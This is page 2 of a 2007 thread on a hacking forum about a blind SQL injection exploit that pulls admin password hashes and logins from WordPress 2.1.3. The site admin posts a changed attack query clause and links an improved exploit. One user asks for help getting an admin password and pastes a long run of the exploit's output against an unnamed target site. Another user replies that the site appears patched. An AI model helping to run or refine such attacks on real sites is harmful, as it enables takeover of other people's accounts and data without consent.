Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: November 23, 2024 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 104 Members: 0 Total: 104 Full disclosure APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1 Local Privilege Escalations in needrestart APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2 APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1 APPLE-SA-11-19-2024-2 visionOS 2.1.1 APPLE-SA-11-19-2024-1 Safari 18.1.1 Reflected XSS - fronsetiav1.1 XXE OOB - fronsetiav1.1 St. Poelten UAS | Path Traversal in Korenix JetPort 5601 St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS) SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879) Security issue in the TX Text Control .NET Server for ASP.NET. SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater Unsafe eval() in TestRail CLI IT Security and Insecurity Portal www.waraxe.us Forum Index -> All other software -> WordPress 2.1.3 sql injection blind fishing exploit Goto page Previous1, 2 View previous topic :: View next topic Posted: Tue May 22, 2007 12:11 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu spec wrote: you're right waraxe, thanks I'm happy to help you Heh, what I read from wordpress delevopers: Quote: The actual cookies contain hashed data, so you don't have to worry about someone gleaning your username and password by reading the cookie data. A hash is the result of a specific mathematical formula applied to some input data (in this case your user name and password, respectively). It's quite hard to reverse a hash (bordering on practical infeasibility with today's computers). This means it is very difficult to take a hash and "unhash" it to find the original input data. Funny thing - so much cryptography applied to make passwords "immune" to crack and still - even WITHOUT actual cracking we can get admin privileges Posted: Tue May 22, 2007 12:21 pm spec Beginner Joined: May 22, 2007 Posts: 4 who needs to unhash a hashed pass in this case? no one, you get to have an admin privileges and thats all it matters, , so much for security Re: What about username they are not all "admin" : Posted: Tue May 22, 2007 3:31 pm _-GORO-_ Beginner Joined: May 22, 2007 Posts: 3 That would be nice, buy I find out that every post on blog has an admin's (user name) as signature of the poster - it is open. BTW - did you try it on any other versions? waraxe wrote: I got it This needs some modifications to exploit. If you are interested, then I can make improved exploit with this additional functionality _-GORO-_ wrote: waraxe wrote: _-GORO-_ wrote: Nice work! What about username they are not all "admin" ? UNION ALL SELECT 1,2,user_name.... ????? One way is to find out ID, which belongs to needed target user. Another way is to modify attack query. Orig: Code: WHERE ID=%d AND IF New: Code: WHERE display_name=%2527waraxe25%27 AND IF Normally id for admin is 1, but username not necessary "admin" The goal is to find out username for specific ID. Example you show here does opposite. Posted: Wed May 23, 2007 12:27 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu OK, it's done - I have posted new version of this exploit: http://www.waraxe.us/ftopict-1780.html It can now retrieve md5 hash AND user login Posted: Sun May 27, 2007 3:02 pm pexli Valuable expert Joined: May 24, 2007 Posts: 665 Location: Bulgaria GORO try this for old versions wordpress. http://milw0rm.com/exploits/3109 i need help Posted: Fri Jul 13, 2007 12:49 am amir00 Beginner Joined: Jul 13, 2007 Posts: 2 I need help to finde admin passwd. Code: sql table prefix: wp_ cookie suffix: c6e75ae1b68abe4cb4cb59d205593067 testing probe delays 8 9 9 9 8 8 mean nondelayed - 8 dsecs mean delayed - 8 dsecs normal delay: 8 deciseconds trying to get md5 hash from target finding hash now ... char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 1 --> 0 current value for user_pass: 0 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 2 --> 0 current value for user_pass: 00 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 3 --> 1 current value for user_pass: 001 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 4 --> 0 current value for user_pass: 0010 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 5 --> 0 current value for user_pass: 00100 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 6 --> 0 current value for user_pass: 001000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 7 --> 0 current value for user_pass: 0010000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 8 --> 0 current value for user_pass: 00100000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 9 --> 0 current value for user_pass: 001000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 10 --> 0 current value for user_pass: 0010000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 11 --> 0 current value for user_pass: 00100000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 12 --> 0 current value for user_pass: 001000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 13 --> 0 current value for user_pass: 0010000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 14 --> 0 current value for user_pass: 00100000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 15 --> 0 current value for user_pass: 001000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 16 --> 0 current value for user_pass: 0010000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 17 --> 0 current value for user_pass: 00100000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 18 --> 0 current value for user_pass: 001000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 19 --> 0 current value for user_pass: 0010000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 20 --> 0 current value for user_pass: 00100000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 21 --> 0 current value for user_pass: 001000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 22 --> 0 current value for user_pass: 0010000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 23 --> 0 current value for user_pass: 00100000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 24 --> 0 current value for user_pass: 001000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 25 --> 0 current value for user_pass: 0010000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 26 --> 0 current value for user_pass: 00100000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 27 --> 0 current value for user_pass: 001000000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 28 --> 0 current value for user_pass: 0010000000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 29 --> 0 current value for user_pass: 00100000000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 30 --> 0 current value for user_pass: 001000000000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 31 --> 0 current value for user_pass: 0010000000000000000000000000000 char to find is [0-9] curr: 52--52--48 curr: 50--50--48 curr: 49--49--48 got user_pass pos 32 --> 0 current value for user_pass: 00100000000000000000000000000000 Final result: user_pass=00100000000000000000000000000000 trying to get user login from target first we need user login length ... starting user_login length retrieve curr: 30--30--0 curr: 15--15--0 curr: 7--7--0 curr: 3--3--0 curr: 1--1--0 user login length is 0 chars finding user login now ... Final result: user_login= Work finished Questions and feedback - http://www.waraxe.us/ See ya! :) Posted: Fri Jul 13, 2007 2:22 am Sm0ke Moderator Joined: Nov 25, 2006 Posts: 141 Location: Finland user_pass=00100000000000000000000000000000 Posted: Fri Jul 13, 2007 9:30 am waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu It seems to be patched WP installation, so that this exploit is not working (anymore) ... Posted: Fri Jul 13, 2007 4:05 pm amir00 Beginner Joined: Jul 13, 2007 Posts: 2 waraxe wrote: It seems to be patched WP installation, so that this exploit is not working (anymore) ... ok . thank WordPress 2.1.3 sql injection blind fishing exploit www.waraxe.us Forum Index -> All other software You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 2 of 2 Goto page Previous1, 2 All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.047 Seconds